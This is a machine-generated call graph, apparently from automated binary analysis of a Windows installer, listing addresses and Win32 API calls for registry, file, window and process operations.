4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 